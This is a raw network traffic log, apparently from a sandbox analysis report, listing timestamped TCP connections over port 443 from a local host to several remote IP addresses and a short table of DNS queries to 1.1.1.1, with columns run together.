                                                                                                                          Dec 19, 2024 17:09:16.546966076 CET49800443192.168.2.16104.18.95.41
                                                                                                                          Dec 19, 2024 17:09:16.546987057 CET44349800104.18.95.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:16.547321081 CET44349800104.18.95.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:16.547739983 CET49800443192.168.2.16104.18.95.41
                                                                                                                          Dec 19, 2024 17:09:16.547805071 CET44349800104.18.95.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:16.547903061 CET49800443192.168.2.16104.18.95.41
                                                                                                                          Dec 19, 2024 17:09:16.595328093 CET44349800104.18.95.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:16.666346073 CET44349798104.18.95.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:16.666439056 CET44349798104.18.95.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:16.666604996 CET49798443192.168.2.16104.18.95.41
                                                                                                                          Dec 19, 2024 17:09:16.667332888 CET49798443192.168.2.16104.18.95.41
                                                                                                                          Dec 19, 2024 17:09:16.667356968 CET44349798104.18.95.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:16.791156054 CET4434979935.190.80.1192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:16.791256905 CET4434979935.190.80.1192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:16.791418076 CET49799443192.168.2.1635.190.80.1
                                                                                                                          Dec 19, 2024 17:09:16.791450024 CET49799443192.168.2.1635.190.80.1
                                                                                                                          Dec 19, 2024 17:09:16.791461945 CET4434979935.190.80.1192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:16.791471004 CET49799443192.168.2.1635.190.80.1
                                                                                                                          Dec 19, 2024 17:09:16.791515112 CET49799443192.168.2.1635.190.80.1
                                                                                                                          Dec 19, 2024 17:09:16.989366055 CET44349800104.18.95.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:16.989453077 CET44349800104.18.95.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:16.989521980 CET44349800104.18.95.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:16.989691973 CET49800443192.168.2.16104.18.95.41
                                                                                                                          Dec 19, 2024 17:09:16.989691973 CET49800443192.168.2.16104.18.95.41
                                                                                                                          Dec 19, 2024 17:09:16.990684032 CET49800443192.168.2.16104.18.95.41
                                                                                                                          Dec 19, 2024 17:09:16.990705967 CET44349800104.18.95.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:17.170470953 CET49801443192.168.2.16104.18.95.41
                                                                                                                          Dec 19, 2024 17:09:17.170532942 CET44349801104.18.95.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:17.170690060 CET49801443192.168.2.16104.18.95.41
                                                                                                                          Dec 19, 2024 17:09:17.171000957 CET49801443192.168.2.16104.18.95.41
                                                                                                                          Dec 19, 2024 17:09:17.171014071 CET44349801104.18.95.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:18.384078979 CET44349801104.18.95.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:18.384424925 CET49801443192.168.2.16104.18.95.41
                                                                                                                          Dec 19, 2024 17:09:18.384452105 CET44349801104.18.95.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:18.384876966 CET44349801104.18.95.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:18.385296106 CET49801443192.168.2.16104.18.95.41
                                                                                                                          Dec 19, 2024 17:09:18.385355949 CET44349801104.18.95.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:18.385535002 CET49801443192.168.2.16104.18.95.41
                                                                                                                          Dec 19, 2024 17:09:18.427366018 CET44349801104.18.95.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:18.435276031 CET49801443192.168.2.16104.18.95.41
                                                                                                                          Dec 19, 2024 17:09:18.830291986 CET44349801104.18.95.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:18.830463886 CET44349801104.18.95.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:18.830651999 CET49801443192.168.2.16104.18.95.41
                                                                                                                          Dec 19, 2024 17:09:18.831063986 CET49801443192.168.2.16104.18.95.41
                                                                                                                          Dec 19, 2024 17:09:18.831077099 CET44349801104.18.95.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:18.833887100 CET49803443192.168.2.16104.18.95.41
                                                                                                                          Dec 19, 2024 17:09:18.833904982 CET44349803104.18.95.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:18.833995104 CET49803443192.168.2.16104.18.95.41
                                                                                                                          Dec 19, 2024 17:09:18.834249973 CET49803443192.168.2.16104.18.95.41
                                                                                                                          Dec 19, 2024 17:09:18.834263086 CET44349803104.18.95.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:19.206444979 CET49804443192.168.2.16104.18.95.41
                                                                                                                          Dec 19, 2024 17:09:19.206542015 CET44349804104.18.95.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:19.206801891 CET49804443192.168.2.16104.18.95.41
                                                                                                                          Dec 19, 2024 17:09:19.206973076 CET49804443192.168.2.16104.18.95.41
                                                                                                                          Dec 19, 2024 17:09:19.207006931 CET44349804104.18.95.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:20.047285080 CET44349803104.18.95.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:20.047780037 CET49803443192.168.2.16104.18.95.41
                                                                                                                          Dec 19, 2024 17:09:20.047797918 CET44349803104.18.95.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:20.048490047 CET44349803104.18.95.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:20.048913956 CET49803443192.168.2.16104.18.95.41
                                                                                                                          Dec 19, 2024 17:09:20.049005032 CET44349803104.18.95.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:20.049088955 CET49803443192.168.2.16104.18.95.41
                                                                                                                          Dec 19, 2024 17:09:20.095330954 CET44349803104.18.95.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:20.421099901 CET44349804104.18.95.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:20.421433926 CET49804443192.168.2.16104.18.95.41
                                                                                                                          Dec 19, 2024 17:09:20.421464920 CET44349804104.18.95.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:20.421879053 CET44349804104.18.95.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:20.422270060 CET49804443192.168.2.16104.18.95.41
                                                                                                                          Dec 19, 2024 17:09:20.422333956 CET44349804104.18.95.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:20.422465086 CET49804443192.168.2.16104.18.95.41
                                                                                                                          Dec 19, 2024 17:09:20.422548056 CET49804443192.168.2.16104.18.95.41
                                                                                                                          Dec 19, 2024 17:09:20.422574043 CET44349804104.18.95.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:20.422665119 CET49804443192.168.2.16104.18.95.41
                                                                                                                          Dec 19, 2024 17:09:20.422691107 CET44349804104.18.95.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:20.591506004 CET44349803104.18.95.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:20.591609001 CET44349803104.18.95.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:20.591809988 CET49803443192.168.2.16104.18.95.41
                                                                                                                          Dec 19, 2024 17:09:20.592763901 CET49803443192.168.2.16104.18.95.41
                                                                                                                          Dec 19, 2024 17:09:20.592784882 CET44349803104.18.95.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:21.033962965 CET44349804104.18.95.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:21.034025908 CET44349804104.18.95.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:21.034075022 CET44349804104.18.95.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:21.034096003 CET49804443192.168.2.16104.18.95.41
                                                                                                                          Dec 19, 2024 17:09:21.034112930 CET44349804104.18.95.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:21.034310102 CET49804443192.168.2.16104.18.95.41
                                                                                                                          Dec 19, 2024 17:09:21.034310102 CET49804443192.168.2.16104.18.95.41
                                                                                                                          Dec 19, 2024 17:09:21.034322977 CET44349804104.18.95.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:21.042197943 CET44349804104.18.95.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:21.042265892 CET49804443192.168.2.16104.18.95.41
                                                                                                                          Dec 19, 2024 17:09:21.042280912 CET44349804104.18.95.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:21.083266973 CET49804443192.168.2.16104.18.95.41
                                                                                                                          Dec 19, 2024 17:09:21.083275080 CET44349804104.18.95.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:21.131200075 CET49804443192.168.2.16104.18.95.41
                                                                                                                          Dec 19, 2024 17:09:21.153944016 CET44349804104.18.95.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:21.158090115 CET44349804104.18.95.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:21.158224106 CET49804443192.168.2.16104.18.95.41
                                                                                                                          Dec 19, 2024 17:09:21.158240080 CET44349804104.18.95.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:21.211224079 CET49804443192.168.2.16104.18.95.41
                                                                                                                          Dec 19, 2024 17:09:21.225447893 CET44349804104.18.95.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:21.230879068 CET44349804104.18.95.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:21.230973005 CET49804443192.168.2.16104.18.95.41
                                                                                                                          Dec 19, 2024 17:09:21.230986118 CET44349804104.18.95.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:21.239082098 CET44349804104.18.95.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:21.239177942 CET49804443192.168.2.16104.18.95.41
                                                                                                                          Dec 19, 2024 17:09:21.239186049 CET44349804104.18.95.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:21.247085094 CET44349804104.18.95.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:21.247124910 CET44349804104.18.95.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:21.247198105 CET49804443192.168.2.16104.18.95.41
                                                                                                                          Dec 19, 2024 17:09:21.247208118 CET44349804104.18.95.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:21.247229099 CET44349804104.18.95.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:21.247262001 CET49804443192.168.2.16104.18.95.41
                                                                                                                          Dec 19, 2024 17:09:21.247298956 CET49804443192.168.2.16104.18.95.41
                                                                                                                          Dec 19, 2024 17:09:21.247409105 CET49804443192.168.2.16104.18.95.41
                                                                                                                          Dec 19, 2024 17:09:21.247426987 CET44349804104.18.95.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:21.250406981 CET49805443192.168.2.16104.18.95.41
                                                                                                                          Dec 19, 2024 17:09:21.250473022 CET44349805104.18.95.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:21.250602961 CET49805443192.168.2.16104.18.95.41
                                                                                                                          Dec 19, 2024 17:09:21.250847101 CET49805443192.168.2.16104.18.95.41
                                                                                                                          Dec 19, 2024 17:09:21.250885010 CET44349805104.18.95.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:22.494853020 CET44349805104.18.95.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:22.495269060 CET49805443192.168.2.16104.18.95.41
                                                                                                                          Dec 19, 2024 17:09:22.495361090 CET44349805104.18.95.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:22.496654034 CET44349805104.18.95.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:22.497092962 CET49805443192.168.2.16104.18.95.41
                                                                                                                          Dec 19, 2024 17:09:22.497308969 CET44349805104.18.95.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:22.497337103 CET49805443192.168.2.16104.18.95.41
                                                                                                                          Dec 19, 2024 17:09:22.539407015 CET44349805104.18.95.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:22.551242113 CET49805443192.168.2.16104.18.95.41
                                                                                                                          Dec 19, 2024 17:09:22.949110985 CET44349805104.18.95.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:22.949299097 CET44349805104.18.95.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:22.949676037 CET49805443192.168.2.16104.18.95.41
                                                                                                                          Dec 19, 2024 17:09:22.950510979 CET49805443192.168.2.16104.18.95.41
                                                                                                                          Dec 19, 2024 17:09:22.950546026 CET44349805104.18.95.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:24.429500103 CET49806443192.168.2.16104.18.95.41
                                                                                                                          Dec 19, 2024 17:09:24.429533958 CET44349806104.18.95.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:24.429764986 CET49806443192.168.2.16104.18.95.41
                                                                                                                          Dec 19, 2024 17:09:24.430053949 CET49806443192.168.2.16104.18.95.41
                                                                                                                          Dec 19, 2024 17:09:24.430068970 CET44349806104.18.95.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:25.453560114 CET49697443192.168.2.1620.190.147.1
                                                                                                                          Dec 19, 2024 17:09:25.453665018 CET4969980192.168.2.16192.229.221.95
                                                                                                                          Dec 19, 2024 17:09:25.575551987 CET4434969720.190.147.1192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:25.575642109 CET49697443192.168.2.1620.190.147.1
                                                                                                                          Dec 19, 2024 17:09:25.576409101 CET8049699192.229.221.95192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:25.576591015 CET4969980192.168.2.16192.229.221.95
                                                                                                                          Dec 19, 2024 17:09:25.649166107 CET44349806104.18.95.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:25.649532080 CET49806443192.168.2.16104.18.95.41
                                                                                                                          Dec 19, 2024 17:09:25.649543047 CET44349806104.18.95.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:25.650252104 CET44349806104.18.95.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:25.650655031 CET49806443192.168.2.16104.18.95.41
                                                                                                                          Dec 19, 2024 17:09:25.650746107 CET44349806104.18.95.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:25.650835037 CET49806443192.168.2.16104.18.95.41
                                                                                                                          Dec 19, 2024 17:09:25.651040077 CET49806443192.168.2.16104.18.95.41
                                                                                                                          Dec 19, 2024 17:09:25.651077032 CET44349806104.18.95.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:25.651195049 CET49806443192.168.2.16104.18.95.41
                                                                                                                          Dec 19, 2024 17:09:25.651227951 CET44349806104.18.95.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:26.278109074 CET44349806104.18.95.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:26.278321028 CET44349806104.18.95.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:26.278470039 CET44349806104.18.95.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:26.278511047 CET49806443192.168.2.16104.18.95.41
                                                                                                                          Dec 19, 2024 17:09:26.278527021 CET44349806104.18.95.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:26.278692007 CET49806443192.168.2.16104.18.95.41
                                                                                                                          Dec 19, 2024 17:09:26.278692961 CET44349806104.18.95.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:26.278760910 CET49806443192.168.2.16104.18.95.41
                                                                                                                          Dec 19, 2024 17:09:26.279198885 CET49806443192.168.2.16104.18.95.41
                                                                                                                          Dec 19, 2024 17:09:26.279208899 CET44349806104.18.95.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:26.282332897 CET49807443192.168.2.16104.18.95.41
                                                                                                                          Dec 19, 2024 17:09:26.282426119 CET44349807104.18.95.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:26.282541990 CET49807443192.168.2.16104.18.95.41
                                                                                                                          Dec 19, 2024 17:09:26.282826900 CET49807443192.168.2.16104.18.95.41
                                                                                                                          Dec 19, 2024 17:09:26.282865047 CET44349807104.18.95.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:26.813961029 CET49808443192.168.2.16172.67.130.58
                                                                                                                          Dec 19, 2024 17:09:26.814054012 CET44349808172.67.130.58192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:26.814471960 CET49808443192.168.2.16172.67.130.58
                                                                                                                          Dec 19, 2024 17:09:26.814690113 CET49808443192.168.2.16172.67.130.58
                                                                                                                          Dec 19, 2024 17:09:26.814743996 CET44349808172.67.130.58192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:27.499022961 CET44349807104.18.95.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:27.499695063 CET49807443192.168.2.16104.18.95.41
                                                                                                                          Dec 19, 2024 17:09:27.499758959 CET44349807104.18.95.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:27.500242949 CET44349807104.18.95.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:27.500798941 CET49807443192.168.2.16104.18.95.41
                                                                                                                          Dec 19, 2024 17:09:27.500885963 CET49807443192.168.2.16104.18.95.41
                                                                                                                          Dec 19, 2024 17:09:27.500912905 CET44349807104.18.95.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:27.500937939 CET44349807104.18.95.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:27.545344114 CET49807443192.168.2.16104.18.95.41
                                                                                                                          Dec 19, 2024 17:09:27.943980932 CET44349807104.18.95.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:27.944149971 CET44349807104.18.95.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:27.944384098 CET49807443192.168.2.16104.18.95.41
                                                                                                                          Dec 19, 2024 17:09:27.945503950 CET49807443192.168.2.16104.18.95.41
                                                                                                                          Dec 19, 2024 17:09:27.945569038 CET44349807104.18.95.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:28.031259060 CET44349808172.67.130.58192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:28.031744003 CET49808443192.168.2.16172.67.130.58
                                                                                                                          Dec 19, 2024 17:09:28.031806946 CET44349808172.67.130.58192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:28.035391092 CET44349808172.67.130.58192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:28.035497904 CET49808443192.168.2.16172.67.130.58
                                                                                                                          Dec 19, 2024 17:09:28.035979986 CET49808443192.168.2.16172.67.130.58
                                                                                                                          Dec 19, 2024 17:09:28.036082983 CET49808443192.168.2.16172.67.130.58
                                                                                                                          Dec 19, 2024 17:09:28.036082983 CET49808443192.168.2.16172.67.130.58
                                                                                                                          Dec 19, 2024 17:09:28.036171913 CET44349808172.67.130.58192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:28.036257982 CET49808443192.168.2.16172.67.130.58
                                                                                                                          Dec 19, 2024 17:09:28.036514044 CET49809443192.168.2.16172.67.130.58
                                                                                                                          Dec 19, 2024 17:09:28.036598921 CET44349809172.67.130.58192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:28.036722898 CET49809443192.168.2.16172.67.130.58
                                                                                                                          Dec 19, 2024 17:09:28.037045002 CET49809443192.168.2.16172.67.130.58
                                                                                                                          Dec 19, 2024 17:09:28.037096024 CET44349809172.67.130.58192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:29.266302109 CET44349809172.67.130.58192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:29.266716957 CET49809443192.168.2.16172.67.130.58
                                                                                                                          Dec 19, 2024 17:09:29.266737938 CET44349809172.67.130.58192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:29.268394947 CET44349809172.67.130.58192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:29.268497944 CET49809443192.168.2.16172.67.130.58
                                                                                                                          Dec 19, 2024 17:09:29.269895077 CET49809443192.168.2.16172.67.130.58
                                                                                                                          Dec 19, 2024 17:09:29.270108938 CET49809443192.168.2.16172.67.130.58
                                                                                                                          Dec 19, 2024 17:09:29.270114899 CET44349809172.67.130.58192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:29.270170927 CET44349809172.67.130.58192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:29.317235947 CET49809443192.168.2.16172.67.130.58
                                                                                                                          Dec 19, 2024 17:09:29.317244053 CET44349809172.67.130.58192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:29.365262032 CET49809443192.168.2.16172.67.130.58
                                                                                                                          Dec 19, 2024 17:09:30.197510958 CET49701443192.168.2.1620.190.147.1
                                                                                                                          Dec 19, 2024 17:09:30.317878008 CET4434970120.190.147.1192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:30.318176031 CET49701443192.168.2.1620.190.147.1
                                                                                                                          Dec 19, 2024 17:09:30.375929117 CET44349809172.67.130.58192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:30.376214027 CET44349809172.67.130.58192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:30.376492023 CET49809443192.168.2.16172.67.130.58
                                                                                                                          Dec 19, 2024 17:09:30.377376080 CET49809443192.168.2.16172.67.130.58
                                                                                                                          Dec 19, 2024 17:09:30.377403021 CET44349809172.67.130.58192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:30.531126022 CET49810443192.168.2.16172.67.130.58
                                                                                                                          Dec 19, 2024 17:09:30.531218052 CET44349810172.67.130.58192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:30.531353951 CET49810443192.168.2.16172.67.130.58
                                                                                                                          Dec 19, 2024 17:09:30.531680107 CET49810443192.168.2.16172.67.130.58
                                                                                                                          Dec 19, 2024 17:09:30.531713963 CET44349810172.67.130.58192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:31.751216888 CET44349810172.67.130.58192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:31.751785040 CET49810443192.168.2.16172.67.130.58
                                                                                                                          Dec 19, 2024 17:09:31.751849890 CET44349810172.67.130.58192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:31.755445004 CET44349810172.67.130.58192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:31.755985022 CET49810443192.168.2.16172.67.130.58
                                                                                                                          Dec 19, 2024 17:09:31.756405115 CET49810443192.168.2.16172.67.130.58
                                                                                                                          Dec 19, 2024 17:09:31.756406069 CET49810443192.168.2.16172.67.130.58
                                                                                                                          Dec 19, 2024 17:09:31.756406069 CET49810443192.168.2.16172.67.130.58
                                                                                                                          Dec 19, 2024 17:09:31.756519079 CET49811443192.168.2.16172.67.130.58
                                                                                                                          Dec 19, 2024 17:09:31.756571054 CET44349811172.67.130.58192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:31.756653070 CET44349810172.67.130.58192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:31.756679058 CET49811443192.168.2.16172.67.130.58
                                                                                                                          Dec 19, 2024 17:09:31.756755114 CET49810443192.168.2.16172.67.130.58
                                                                                                                          Dec 19, 2024 17:09:31.757005930 CET49811443192.168.2.16172.67.130.58
                                                                                                                          Dec 19, 2024 17:09:31.757023096 CET44349811172.67.130.58192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:33.009694099 CET44349811172.67.130.58192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:33.010260105 CET49811443192.168.2.16172.67.130.58
                                                                                                                          Dec 19, 2024 17:09:33.010279894 CET44349811172.67.130.58192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:33.011732101 CET44349811172.67.130.58192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:33.011904001 CET49811443192.168.2.16172.67.130.58
                                                                                                                          Dec 19, 2024 17:09:33.012321949 CET49811443192.168.2.16172.67.130.58
                                                                                                                          Dec 19, 2024 17:09:33.012399912 CET44349811172.67.130.58192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:33.012418985 CET49811443192.168.2.16172.67.130.58
                                                                                                                          Dec 19, 2024 17:09:33.052445889 CET49811443192.168.2.16172.67.130.58
                                                                                                                          Dec 19, 2024 17:09:33.052453995 CET44349811172.67.130.58192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:33.100341082 CET49811443192.168.2.16172.67.130.58
                                                                                                                          Dec 19, 2024 17:09:34.132004023 CET44349811172.67.130.58192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:34.132128000 CET44349811172.67.130.58192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:34.132405996 CET49811443192.168.2.16172.67.130.58
                                                                                                                          Dec 19, 2024 17:09:34.133661985 CET49811443192.168.2.16172.67.130.58
                                                                                                                          Dec 19, 2024 17:09:34.133696079 CET44349811172.67.130.58192.168.2.16
                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                          Dec 19, 2024 17:07:48.675398111 CET53543271.1.1.1192.168.2.16
                                                                                                                          Dec 19, 2024 17:07:48.683568001 CET53584831.1.1.1192.168.2.16
                                                                                                                          Dec 19, 2024 17:07:49.397011042 CET6165553192.168.2.161.1.1.1
                                                                                                                          Dec 19, 2024 17:07:49.397236109 CET5572053192.168.2.161.1.1.1
                                                                                                                          Dec 19, 2024 17:07:50.000262976 CET53616551.1.1.1192.168.2.16
                                                                                                                          Dec 19, 2024 17:07:50.001235962 CET53557201.1.1.1192.168.2.16
                                                                                                                          Dec 19, 2024 17:07:51.571877956 CET53539391.1.1.1192.168.2.16
                                                                                                                          Dec 19, 2024 17:07:52.396085024 CET5741653192.168.2.161.1.1.1
                                                                                                                          Dec 19, 2024 17:07:52.396204948 CET5900353192.168.2.161.1.1.1
                                                                                                                          Dec 19, 2024 17:07:53.306292057 CET5735053192.168.2.161.1.1.1
                                                                                                                          Dec 19, 2024 17:07:53.306500912 CET5323653192.168.2.161.1.1.1
                                                                                                                          Dec 19, 2024 17:07:53.421106100 CET6284953192.168.2.161.1.1.1
                                                                                                                          Dec 19, 2024 17:07:53.421276093 CET6218753192.168.2.161.1.1.1
                                                                                                                          Dec 19, 2024 17:07:53.443191051 CET53532361.1.1.1192.168.2.16
                                                                                                                          Dec 19, 2024 17:07:53.443552971 CET53573501.1.1.1192.168.2.16
                                                                                                                          Dec 19, 2024 17:07:55.002902985 CET53574161.1.1.1192.168.2.16
                                                                                                                          Dec 19, 2024 17:07:55.003493071 CET53628491.1.1.1192.168.2.16
                                                                                                                          Dec 19, 2024 17:07:55.003599882 CET53590031.1.1.1192.168.2.16
                                                                                                                          Dec 19, 2024 17:07:55.003823042 CET53621871.1.1.1192.168.2.16
                                                                                                                          Dec 19, 2024 17:07:56.861903906 CET5616153192.168.2.161.1.1.1
                                                                                                                          Dec 19, 2024 17:07:56.862131119 CET6319753192.168.2.161.1.1.1
                                                                                                                          Dec 19, 2024 17:07:56.998819113 CET53561611.1.1.1192.168.2.16
                                                                                                                          Dec 19, 2024 17:07:56.998835087 CET53631971.1.1.1192.168.2.16
                                                                                                                          Dec 19, 2024 17:07:58.606412888 CET5320553192.168.2.161.1.1.1
                                                                                                                          Dec 19, 2024 17:07:58.606550932 CET5264453192.168.2.161.1.1.1
                                                                                                                          Dec 19, 2024 17:07:58.607958078 CET5247053192.168.2.161.1.1.1
                                                                                                                          Dec 19, 2024 17:07:58.608165026 CET5465053192.168.2.161.1.1.1
                                                                                                                          Dec 19, 2024 17:07:58.609328032 CET6061853192.168.2.161.1.1.1
                                                                                                                          Dec 19, 2024 17:07:58.609509945 CET5990253192.168.2.161.1.1.1
                                                                                                                          Dec 19, 2024 17:07:58.743228912 CET53532051.1.1.1192.168.2.16
                                                                                                                          Dec 19, 2024 17:07:58.745266914 CET53526441.1.1.1192.168.2.16
                                                                                                                          Dec 19, 2024 17:07:58.746021986 CET53606181.1.1.1192.168.2.16
                                                                                                                          Dec 19, 2024 17:07:58.746102095 CET53599021.1.1.1192.168.2.16
                                                                                                                          Dec 19, 2024 17:07:58.956701994 CET53546501.1.1.1192.168.2.16
                                                                                                                          Dec 19, 2024 17:07:58.986948013 CET53524701.1.1.1192.168.2.16
                                                                                                                          Dec 19, 2024 17:07:59.532171965 CET6448653192.168.2.161.1.1.1
                                                                                                                          Dec 19, 2024 17:07:59.532392025 CET6335253192.168.2.161.1.1.1
                                                                                                                          Dec 19, 2024 17:07:59.671263933 CET53633521.1.1.1192.168.2.16
                                                                                                                          Dec 19, 2024 17:07:59.671279907 CET53644861.1.1.1192.168.2.16
                                                                                                                          Dec 19, 2024 17:07:59.671289921 CET53565341.1.1.1192.168.2.16
                                                                                                                          Dec 19, 2024 17:08:01.147695065 CET5908953192.168.2.161.1.1.1
                                                                                                                          Dec 19, 2024 17:08:01.147695065 CET5046053192.168.2.161.1.1.1
                                                                                                                          Dec 19, 2024 17:08:01.292361975 CET53504601.1.1.1192.168.2.16
                                                                                                                          Dec 19, 2024 17:08:01.297931910 CET53590891.1.1.1192.168.2.16
                                                                                                                          Dec 19, 2024 17:08:01.873418093 CET5044853192.168.2.161.1.1.1
                                                                                                                          Dec 19, 2024 17:08:01.873611927 CET5498153192.168.2.161.1.1.1
                                                                                                                          Dec 19, 2024 17:08:02.010236025 CET53504481.1.1.1192.168.2.16
                                                                                                                          Dec 19, 2024 17:08:02.011806965 CET53549811.1.1.1192.168.2.16
                                                                                                                          Dec 19, 2024 17:08:03.370065928 CET6197453192.168.2.161.1.1.1
                                                                                                                          Dec 19, 2024 17:08:03.370444059 CET6448053192.168.2.161.1.1.1
                                                                                                                          Dec 19, 2024 17:08:03.487322092 CET53529611.1.1.1192.168.2.16
                                                                                                                          Dec 19, 2024 17:08:03.507235050 CET53619741.1.1.1192.168.2.16
                                                                                                                          Dec 19, 2024 17:08:03.507746935 CET53644801.1.1.1192.168.2.16
